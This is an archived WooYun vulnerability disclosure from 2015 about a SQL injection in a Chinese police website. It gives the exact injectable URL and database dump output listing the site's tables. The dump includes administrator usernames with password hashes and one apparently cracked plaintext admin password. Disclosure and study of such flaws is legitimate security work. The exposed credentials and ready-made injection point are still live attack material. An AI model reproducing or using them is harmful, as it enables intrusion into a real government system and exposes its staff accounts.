乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-03: 细节已通知厂商并且等待厂商处理中 2015-09-08: 厂商已经主动忽略漏洞,细节向公众公开
RT!
注入点:
http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21
加个*号即可报错。代入语句
http://www.ycpolice.com/index.php/Index/showlist/Class_ID/21*
数据库和管理员权限:
current database: 'ycpolice'
[15:24:29] [INFO] resumed: yin_yanhuoDatabase: ycpolice[54 tables]+------------------+| yin_about || yin_actions || yin_address || yin_admin || yin_ajcheck || yin_baopozy || yin_bendisfz || yin_cardopen || yin_chenshibp || yin_chujinsi || yin_company || yin_complain || yin_config || yin_constable || yin_customer || yin_daxinhd || yin_department || yin_fenip || yin_findman || yin_gangaodj || yin_gknews || yin_gknewsclass || yin_guideclass || yin_jsxinxi || yin_jubao || yin_liuyan || yin_maps || yin_member || yin_message || yin_mycar || yin_news || yin_node || yin_photos || yin_pthuzhao || yin_reconsider || yin_renzhengma || yin_role || yin_showask || yin_suggestion || yin_user || yin_userguide || yin_waidisfz || yin_wanglaitw || yin_xinserver10 || yin_xinserver102 || yin_xinserver12 || yin_xinserver13 || yin_xinserver5 || yin_xinserver6 || yin_xinserver81 || yin_xinserver82 || yin_xinserver9 || yin_xinzhenfy || yin_yanhuo |+------------------+
延时注入很慢。。。。。就跑了主要的!
得到管理员用户和密码。跑完这里花了差不多2个小时,还有好多,不跑了,
Database: ycpoliceTable: yin_admin+---------------+-----------------------------------+| AdminName | AdminPass |+---------------+-----------------------------------+| admin | ee702fe1e29a440eff95fbb8f5401b8a || anfang | d123a7a95ba0bcec6e6be6ba4e1c3f01 || baixiaofeng | c8837b23ff8aaa8a2dde915473ce0991 || beijie | 324d1907d9ca6733d399b87affe48c74 || bgs001 | 189103a260b8899ab8d3f524f484369b || bjs | d41d8cd98f00b204e9800998ecf8427e || bjx001 | f5ee68970ae263e56816d4051807ae52 || bjzl001 | c8837b23ff8aaa8a2dde915473ce099 || BTG | db412c68a444b151308264631876567 |+---------------+-----------------------------------+
跑的太慢了,就列了前面几个,其中有admin/dc6915681就这样吧。。
特殊字符过滤!
危害等级:无影响厂商忽略
忽略时间:2015-09-08 18:18
暂无